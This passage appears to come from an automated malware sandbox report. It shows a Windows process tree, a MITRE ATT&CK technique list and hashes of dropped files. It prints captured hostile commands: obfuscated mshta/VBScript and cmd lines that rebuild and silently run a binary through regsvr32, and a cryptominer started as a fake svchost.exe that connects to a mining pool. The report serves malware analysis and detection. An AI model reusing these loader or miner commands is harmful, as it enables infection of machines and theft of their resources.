                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:5780
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vBScRIpT: ClOSe ( creAteOBJect ( "WScrIpt.sHeLL" ). RUN ( "C:\Windows\system32\cmd.exe /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe"" SSD3pQMwaP.exe && STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr & if ""-PmLQymN~qiAE1Rr"" == """" for %y In (""C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe"" ) do taskkill -Im ""%~nxy"" /f " , 0 , tRUE ) )
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:4164
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe" SSD3pQMwaP.exe &&STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr& if "-PmLQymN~qiAE1Rr" == "" for %y In ("C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe" ) do taskkill -Im "%~nxy" /f
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                        PID:3788
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VBsCRiPt: cLOse ( CrEAteObjECt ( "WscRipt.sHElL" ). rUN ( "CmD /q /c EcHO vmbeC:\Users\Admin\AppData\Roaming_Wxf> C0iS.XE & echo | Set /P = ""MZ"" > 66WBQ~Nm.TVY & CoPY /y /B 66WBQ~Nm.TvY + Amo1ATs.M5 + eBH3o.q9X+ afLCPDH.SV +tMs2M.8AZ + PDPCi.BNj + C0IS.xe nKBJL.CW6 & StArT regsvr32.exe /U .\NKBJL.cW6 /S ", 0 , trUe ) )
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:5924
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /q /c EcHO vmbeC:\Users\Admin\AppData\Roaming_Wxf> C0iS.XE & echo | Set /P = "MZ" > 66WBQ~Nm.TVY &CoPY /y /B 66WBQ~Nm.TvY+Amo1ATs.M5 + eBH3o.q9X+ afLCPDH.SV +tMs2M.8AZ + PDPCi.BNj + C0IS.xe nKBJL.CW6 & StArT regsvr32.exe /U .\NKBJL.cW6 /S
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                            PID:4760
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo "
                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                PID:984
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>66WBQ~Nm.TVY"
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                  PID:5680
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                  regsvr32.exe /U .\NKBJL.cW6 /S
                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                    PID:5876
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                              taskkill -Im "DE56.exe" /f
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                              PID:5624
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\ruugvahg\cpgphuwq.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\ruugvahg\cpgphuwq.exe /d"C:\Users\Admin\AppData\Local\Temp\CF51.exe"
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:5556
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                            svchost.exe
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:5972
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:1316
                                                                                                                                                                                                                                                                            • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              PID:4924

                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                            Execution

                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                            Modify Existing Service

                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                            T1031

                                                                                                                                                                                                                                                                            New Service

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1050

                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1060

                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                            Hidden Files and Directories

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1158

                                                                                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                                                                                            New Service

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1050

                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                            Disabling Security Tools

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1089

                                                                                                                                                                                                                                                                            File Deletion

                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                            T1107

                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                                                                            Hidden Files and Directories

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1158

                                                                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                                                                            Credentials in Files

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1081

                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1120

                                                                                                                                                                                                                                                                            Collection

                                                                                                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1005

                                                                                                                                                                                                                                                                            Command and Control

                                                                                                                                                                                                                                                                            Web Service

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1102

                                                                                                                                                                                                                                                                            Impact

                                                                                                                                                                                                                                                                            Inhibit System Recovery

                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                            T1490

                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              09ca782b0f914a3124267efc1edd9811

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              266bbcd8cf0cbd6c17db88cf7fe68635daa22dd6

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              c640dba599d54f838c8a4793ba8cba7351f1b665b1503495a60765f9ff607730

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              50af0749c0dae4f256a0099e5c3537aa1b18eabe46511969216f1cf227c9164cfa2b2b9248098cba3236438fc5243307783ead4d1feeee34064bbfe82e13ea9a

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\libcurl.dll
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\libcurlpp.dll
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\libstdc++-6.dll
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\libwinpthread-1.dll
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\setup_install.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\setup_install.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_1.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_1.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_1.txt
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_2.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_2.txt
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_3.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_3.txt
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_4.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_4.txt
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_5.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_5.txt
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_6.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_6.txt
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              99ab358c6f267b09d7a596548654a6ba

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              d5a643074b69be2281a168983e3f6bef7322f676

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              952040785a3c1dcaea613d2e0d46745d5b631785d26de018fd9f85f8485161d056bf67b19c96ae618d35de5d5991a0dd549d749949faea7a2e0f9991a1aa2b2b

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                                                                                              SHA1

